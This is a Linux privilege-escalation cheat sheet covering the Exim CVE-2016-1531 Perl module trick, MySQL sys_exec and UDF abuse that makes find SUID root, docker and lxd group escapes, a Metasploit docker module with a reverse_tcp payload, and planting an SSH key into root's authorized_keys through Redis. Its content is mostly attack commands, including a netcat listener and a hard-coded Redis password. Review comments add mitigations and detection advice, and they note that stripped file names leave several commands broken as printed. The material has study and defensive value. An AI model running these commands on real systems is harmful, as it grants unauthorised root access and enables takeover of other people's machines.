Table of Contents



# CVE-2016-1531 (Exim local root): the exploit relies on a setuid-root exim
# honouring PERL5LIB/PERL5OPT, so a Perl module dropped in /tmp gets loaded
# with root privileges. In this copy the module file name after /tmp/, the
# rest of the module body and the closing EOF line were stripped, so the
# heredoc below is unterminated and the snippet is not runnable as printed.
echo [ CVE-2016-1531 local root exploit
cat > /tmp/ << EOF
package root;
use strict;
use warnings;
# Loads the module above from /tmp into the setuid exim process.
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
# The chmod target and the exploit script name were stripped from this copy.
chmod 777
./ -m netcat
# NOTE(review): mitigation is a patched Exim that ignores these variables when
# running setuid — check the installed version against the CVE. Detection:
# exim started with PERL5OPT/PERL5LIB set, or Perl modules appearing in /tmp.

# Presumably the listener for the "-m netcat" payload above — confirm.
nc -lvvp 4444


# If MySQL is running as root, you can run commands
# sys_exec()/sys_eval() are not MySQL built-ins: they come from the
# lib_mysqludf_sys UDF library and only exist if it is already registered
# (the UDF section below covers the case where it is not).
# As printed, the first line lacks a leading SELECT and is not a statement on
# its own; the lines after it show the intended form. The usermod call adds
# the named account to the admin group.
sys_exec('usermod -a -G admin username')
Select sys_exec('whoami');
select sys_exec('/bin/bash');
# In lib_mysqludf_sys, sys_eval returns the command's output whereas sys_exec
# returns only its exit status.
Select sys_eval('whoami');
# NOTE(review): detection — `SELECT * FROM mysql.func;` lists registered UDFs;
# an unexpected sys_exec/sys_eval entry is a strong compromise indicator.
# Mitigation: never run mysqld as root.

# If MySQL runs as root and the version is <5, go for User Defined Functions (UDF)

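# Searching for and compiling the exploit
# The original rendering used en-dashes (U+2013) for the option flags, which
# the shell passes through as literal arguments; they are ASCII hyphens here.
# The soname value, the shared-object output name and the chmod target were
# stripped from this copy — as printed, `-o 1518.c` would name the C source as
# the output file, so the input/output names are missing rather than wrong.
searchsploit -m 1518.c
gcc -g -shared -Wl,-soname, -o 1518.c -lc
chmod 777

# Opens a root session in the mysql client; `use mysql;` is typed inside it.
mysql -u root -p
use mysql;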

# Exploitation
# Staging table: a single blob row holds the compiled shared object.
create table foo(line blob);
# load_file() reads the .so from the server's filesystem (path stripped in
# this copy); it needs the FILE privilege and is refused when secure_file_priv
# restricts reads to another directory.
insert into foo values(load_file('/tmp/'));
# INTO DUMPFILE writes the raw bytes back out — here into the plugin
# directory, which the root-running mysqld from the note above can write to
# (file name stripped).
select * from foo into dumpfile '/usr/lib/mysql/plugin/';
# Registers the library's exported symbol as a UDF (soname stripped); the
# entry appears in mysql.func.
create function do_system returns integer soname '';
# Uses the UDF to set the SUID bit on find; the "Privesc" section below
# relies on that.
select do_system('chmod u+s /usr/bin/find');
# NOTE(review): mitigations — run mysqld as an unprivileged user, keep
# plugin_dir non-writable by that user, set secure_file_priv and do not grant
# FILE. Detection: new entries in mysql.func, new .so files in plugin_dir,
# unexpected SUID binaries.

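# Privesc
# find is SUID root after the do_system call above, so its -exec child runs
# as root. The original rendering used en-dashes for -exec; they are ASCII
# hyphens here so find parses the option.
# NOTE(review): detection — audit the filesystem for unexpected SUID bits and
# compare against a known-good baseline; find with the SUID bit is never
# legitimate.
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;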


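# If the user can run docker
# The bind mount exposes the host's /root inside the container, so anyone who
# can talk to the docker daemon effectively has root on the host. The original
# rendering's en-dash in -v is an ASCII hyphen here.
# NOTE(review): membership of the docker group, or an accessible daemon
# socket, is root-equivalent — review it like sudo access.
docker run -v /root:/hack -t debian:jessie /bin/sh -c 'ls -al /hack'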

# Docker privesc on metasploit
# Console transcript, not a script. The lhost value was stripped from this
# copy; "session 1" is presumably an existing session on the victim — confirm.
msf > use exploit/linux/local/docker_daemon_privilege_escalation
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set lhost
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/local/docker_daemon_privilege_escalation) >  set session 1
msf exploit(linux/local/docker_daemon_privilege_escalation) >  run
# Check available images
# Lists images already present locally (no pull needed for the next step).
docker images

# You can mount the / of the host inside a container
# Bind-mounting the host root at /root inside the container exposes the
# entire host filesystem to the container's root user (bind mounts are
# read-write unless :ro is given). This is why docker access must be treated
# as host-root access in threat models and access reviews.
docker run -v /:/root -i -t ubuntu /bin/bash


# You can abuse Redis by writing the public half of an RSA keypair you control
# to disk: the RDB dump is pointed at root's .ssh directory and saved as
# authorized_keys.
# In this copy the file read by `cat` (the public key), the -h host and the
# ssh target are stripped placeholders.
# NOTE(review): the -a value below is a hard-coded password repeated four
# times; a secret committed to notes should be treated as leaked and rotated,
# and kept in a variable or prompted for rather than pasted inline.

# Prepare the public key by adding newlines with the help of the following command
# (presumably so the key lands on its own line inside the binary dump — confirm)
(echo -e "\n\n"; cat; echo -e "\n\n") > public.txt

# Load the malicious public key into redis
# -x reads the value from stdin and stores it under the key "pub".
cat public.txt | redis-cli -h -a 8a7b86a2cd89d96dfcc125ebcc0535e6 -x set pub

# Set path to dump the content with the help of the following command
# CONFIG SET dir redirects where the next SAVE writes the RDB file.
redis-cli -h -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dir "/root/.ssh/"

# Configure the dbfilename as authorized_keys
redis-cli -h -a 8a7b86a2cd89d96dfcc125ebcc0535e6 config set dbfilename authorized_keys

# Save the configuration and exit.
# SAVE writes the dump (containing the key) to /root/.ssh/authorized_keys.
redis-cli -h -a 8a7b86a2cd89d96dfcc125ebcc0535e6 save
# NOTE(review): mitigations — bind Redis to localhost with protected-mode on,
# disable or rename CONFIG (rename-command) so dir/dbfilename cannot be
# changed at runtime, and run redis as an unprivileged user that cannot write
# to /root. Detection: CONFIG SET dir/dbfilename in command logs, RDB-formatted
# files appearing in .ssh directories.

# Then authenticate
# cd .ssh presumably moves to the local directory holding the matching private
# key — confirm. The ssh host was stripped.
cd .ssh
ssh root@


# Searching for the LXD exploit and fetching it (attacker machine)
# 46978 is the searchsploit id used here; build-alpine presumably produces
# the Alpine image tarball consumed further down — confirm.
searchsploit lxd
searchsploit -m 46978
bash build-alpine

# Victim machine
# The file opened in nano, the chmod target and the exploit script name were
# stripped from this copy.
nano # (cp the exploit content)
chmod 777
./ -f alpine-v3.10-x86_64-20190905_0123.tar.gz

# Crawl the host filesystem
# The exploit apparently mounts the host root under /mnt/root inside the
# container (confirm against the exploit source), so the host filesystem is
# browsable from there.
# NOTE(review): membership of the lxd group is root-equivalent on the host;
# review it like docker or sudo access.
cd /mnt/root/